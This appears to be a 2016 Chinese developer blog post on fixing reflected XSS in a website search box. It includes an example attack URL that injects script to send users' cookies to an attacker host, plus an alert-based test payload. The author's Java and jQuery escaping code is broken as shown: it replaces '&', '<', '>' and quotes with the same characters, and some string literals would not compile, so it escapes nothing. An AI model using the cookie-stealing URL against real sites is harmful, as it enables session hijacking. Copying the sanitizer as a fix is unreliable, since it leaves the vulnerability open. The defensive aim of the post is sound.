Loading...

搜索框反射型xss问题解决(网站开发)

什么是反射型XSS
      XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等等。利用该漏洞,攻击者可以劫持已通过验证的用户的会话。劫持到已验证的会话后,攻击发起者拥有该授权用户的所有权限。

反射型XSS漏洞的攻击步骤

(1) 用户正常登录Web应用程序,登录成功会得到一个会话信息的cookie: 
例:Set-cookie:sessId = f16e1035c301aa099c971682d806c0c7 f16e1035c301aa099c971682d806c0c7

(2) 攻击者将含有攻击代码的URL发送给被攻击人,例:http://fovweb.com/xss/message.php?send=%3Cscript%3Edocument.write(‘%3Cimg%20height=0%20width=0%20src=%22 http://hacker.fovweb.com/xss/cookie_save.php%3Fcookie=%3D’%20+%20encodeURL(document.cookie)%20+%20’%22/%3E’)%3C/script%3E

举例子:比如网站一般都有的搜索框,当在输入框里面输入:<script>alert(xx.cookies)</script> 的时候,如果你没有处理xss,那么就会弹出提示框,攻击者可以获取cookie信息,从而达到获取用户的所有权限

一般解决办法:

反射型XSS漏洞处理

了解了一下一般反射型XSS漏洞的处理:

(1) 对一些特殊的标签进行转义; 
(2) 直接过滤掉JavaScript事件标签和一些特殊的html标签; 
(3) 将重要的cookie标记为http only; 
(4) 只允许用户输入我们期望的数据; 
(5) 对数据进行html encode处理等。

我的实际解决方案:

第一,我在后端(java)对要输出到前端的信息,进行特殊字符转换,这样的话jsp页面里就识别不出来为js代码

public static String revertString(String input) {
        // 使失去用处的标签从新有作用
        if (input == null) {
            input = "";
            return input;
        }
        input = input.trim().replaceAll("&", "&");
        input = input.trim().replaceAll("<", "<");
        input = input.trim().replaceAll(">", ">");
        input = input.trim().replaceAll("\t", "    ");
        input = input.trim().replaceAll("\r\n", "\n");
        input = input.trim().replaceAll("\n", "<br>");
        input = input.trim().replaceAll("\"", """);
        input = input.trim().replaceAll("'", "'");
        input = input.trim().replaceAll("\\\\", "\");
        return input;
}

第二,如果你在前端进行赋值的话,也要进行转换

var content = $("#so").val().replace(/&/g, '&').toString().replace(/</g, '<').replace(/>/g, '>');

$('#ssjg_div').html(content ); 

如此就可以解决:搜索框里输入以下所遇到的问题了:

1,<script>alert(xx.cookies)</script>

2,"aa"

3,$nbsp  

posted @ 2016-01-27 14:24  微笑阳光哈*_*  阅读(2038)  评论(0编辑  收藏  举报